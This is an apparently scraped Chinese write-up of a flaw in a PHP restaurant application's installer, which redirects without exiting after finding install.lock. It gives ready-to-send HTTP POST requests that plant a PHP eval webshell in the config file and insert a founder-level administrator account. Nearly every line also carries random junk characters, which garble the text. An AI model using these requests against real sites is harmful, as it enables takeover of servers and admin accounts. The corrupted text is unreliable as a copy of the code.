问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。( q+ x: N0 R% u' ]- T- C& C
+ n) F- G' o4 O2 U1 T' b3 G<?php
( \& F% P+ P& y, w" e1 cif(file_exists("../install.lock"))
6 {- `0 W/ {9 L U, k{4 P+ Z7 M0 r5 n
header("Location: ../");//没有退出' K4 S/ @! x- Z6 q9 P. K8 M
}5 y2 h1 E5 ]3 J, K
. D, Q3 ` e0 H5 L ?//echo 'tst';exit;/ [ _1 C3 ~6 o4 j6 n; Y5 g
require_once("init.php");
+ P- q6 P) J+ m; d: bif(empty($_REQUEST['step']) || $_REQUEST['step']==1) V0 Y% W0 u: S3 |4 m3 d$ A
{
* u d2 q/ k5 S1 I8 L) \可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。- w0 Y9 w) h) s0 J0 ?$ @
* u, G: c& L( u3 Q/ _1 p
1、getshell(很危险)
k; x6 ]: p. J/ _2 Sif(empty($_REQUEST['step']) || $_REQUEST['step']==1)
: q2 |! b& x& @1 \4 F{5 y. r# B1 x. w* @# A
$smarty->assign("step",1);
! ~5 @, I' R6 o- S' T* s6 P$smarty->display("index.html");
0 H* L3 w/ R; o* k}elseif($_REQUEST['step']==2)
) y* W* A7 B7 V{, e6 U: w- \5 T. X" c0 x8 O
$mysql_host=trim($_POST['mysql_host']);5 b; q# _1 B2 }& I, Q" P$ z
$mysql_user=trim($_POST['mysql_user']);
0 o2 M$ B3 B5 Y2 Q* n7 y% N6 ? $mysql_pwd=trim($_POST['mysql_pwd']);, M, N/ D' u4 X2 Y+ K6 `& Y
$mysql_db=trim($_POST['mysql_db']);/ Y& n, T+ T N+ ^! p3 F
$tblpre=trim($_POST['tblpre']);
' U$ z8 t2 P3 P2 m $domain==trim($_POST['domain']);
: F) B: C E6 q- p4 i5 l0 ? $str="<?php \r\n";* v5 B8 }- `$ h& y
$str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";. A3 Y! j" w. w. C H$ f% c9 N
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";9 Q( G3 ]( c, X/ Y
$str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
0 j' D9 h/ u @& X5 C& ` $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
( J2 G& @- N# E& k7 G- G $str.='define("MYSQL_CHARSET","GBK");'."\r\n";; G) v5 z" {6 ]. X: T
$str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";7 Q9 Y" }8 ^$ M5 }0 a
$str.='define("DOMAIN","'.$domain.'");'."\r\n";
% {" c1 |. R7 b5 o# y4 |+ L5 ?, ~ $str.='define("SKINS","default");'."\r\n";- P8 e# @" p# N9 v9 W: l6 `
$str.='?>';( t1 p5 M' S6 K
file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
0 t0 m/ c4 K' n# r- ?3 ^4 J6 o" f# L上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马
. j3 \" U; L; R6 w. VPOST /canting/install/index.php?m=index&step=2 HTTP/1.18 i: z% a+ D5 ]$ m/ D
Host: 192.168.80.129: i$ ?. J6 Z6 W
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0+ f7 Z4 o; Q5 p1 u" M* i8 q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8* p! V ?' C9 g: U0 `
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3" H/ V+ h4 @1 P" j. Q/ a, g, B
Accept-Encoding: gzip, deflate
* \& |+ {) F2 u' P( eReferer: http://192.168.80.129/canting/install/index.php?step=1, H2 C0 R, N' V
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
4 u. |2 ~0 M1 {+ C9 {, N, |/ ]Content-Type: application/x-www-form-urlencoded0 ^& N0 U7 p& {* R% j
Content-Length: 126
8 L3 c0 x1 B8 F& \ 0 Q- ~: `* O" M4 {9 R, \9 b
mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
* P) h9 C" u' z但是这个方法很危险,将导致网站无法运行。
( o3 I# L" d4 j& i I1 H
3 ^, w+ k G+ b/ E% o4 @3 ?2、直接添加管理员
/ {' ~9 B& K! M! H/ N& Z" c. J% ^- n1 G2 K
elseif($_REQUEST['step']==5): s. C+ o1 q5 w, V3 @2 Q
{8 ~* Y/ R7 T/ P
if($_POST)& W7 g5 ~9 W {0 q' G/ L
{ require_once("../config/config.inc.php"); |7 R2 g6 U% G8 @# @
$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
- f& b S1 }7 f5 C( [$ N mysql_select_db(MYSQL_DB,$link);3 C! E8 V, h4 B$ `& M/ f
mysql_query("SET NAMES ".MYSQL_CHARSET );8 o) g/ a1 B# L. G
mysql_query("SET sql_mode=''");- ]) }; p4 p( b8 O
3 I' ?* O+ @/ |9 ~ D $adminname=trim($_POST['adminname']);8 j' ?% v9 m% u- l3 y+ K
$pwd1=trim($_POST['pwd1']);
' V+ y* o. s ?+ `- S" J $pwd2=trim($_POST['pwd2']);
0 H) y( Z8 ]7 Z if(empty($adminname))6 _$ E; r5 T6 `) u. F- H( v4 Y
{
+ g6 ~$ k1 T0 L1 C- g0 }" Y% D$ F4 k& b, A( V
echo "<script>alert('管理员不能为空');history.go(-1);</script>";
! {8 w( r2 e) ^ \3 [ exit();# c* a/ f1 _5 e4 d) y5 r4 y! u) X
}
) I' a, I" }$ ^! z* ?8 N: U6 W if(($pwd1!=$pwd2) or empty($pwd1))
! X" ^! x1 @; l# B5 C; z# P {
. `% R1 S+ z4 L2 b echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出; s% g+ `( F8 Q7 L7 M6 W. m8 F
}
- G9 I6 S# x% Z# ~2 l% g mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
0 {6 P) G8 K- w: E/ t" U }
% Q4 Z$ |5 k9 y$ z3 |9 j/ k这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:
, L/ r8 r( o1 r# i7 @) D2 yPOST /canting/install/index.php?m=index&step=5 HTTP/1.1' B7 j% X3 s: u! z% a
Host: 192.168.80.1291 j7 b9 z- G3 r! h+ C. k
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
I5 r7 L% F4 u% bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8: B M3 I+ x: }. e0 K6 o: n+ ~
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.33 m7 j- N3 S# t, _- ?: V4 J) x+ K3 B4 |
Accept-Encoding: gzip, deflate
* c/ `; V7 s8 L PReferer: http://www.2cto.com /canting/install/index.php?step=1
. P% p% H7 o! NCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc426 a" U0 W, ?5 t$ ^' a c% w
Content-Type: application/x-www-form-urlencoded
$ D' A/ N. @" M$ y+ k# ]! G/ cContent-Length: 463 v/ j3 T b5 ?$ _' e& m
% d/ {8 l. @7 ~4 }adminname=qingshen&pwd1=qingshen&pwd2=qingshen( }% F$ [: Y6 _7 O' D9 b
|